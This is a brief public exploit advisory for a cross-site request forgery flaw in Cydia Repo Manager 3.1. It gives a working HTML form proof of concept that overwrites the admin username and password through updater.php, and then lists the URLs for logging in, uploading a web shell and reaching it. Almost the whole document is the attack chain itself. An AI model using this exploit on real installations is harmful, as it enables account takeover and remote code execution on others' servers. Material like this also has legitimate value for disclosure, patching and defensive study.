# Cydia Repo Manager CSRF Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
# Software Link: http://damarist.de/?lang=en
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
# Tested: Win 7

Proof of concept:

<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>

Login : http://bastardlabs/[CydiaRepoManager_path]/index.php
Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php
Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php

Demo :
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png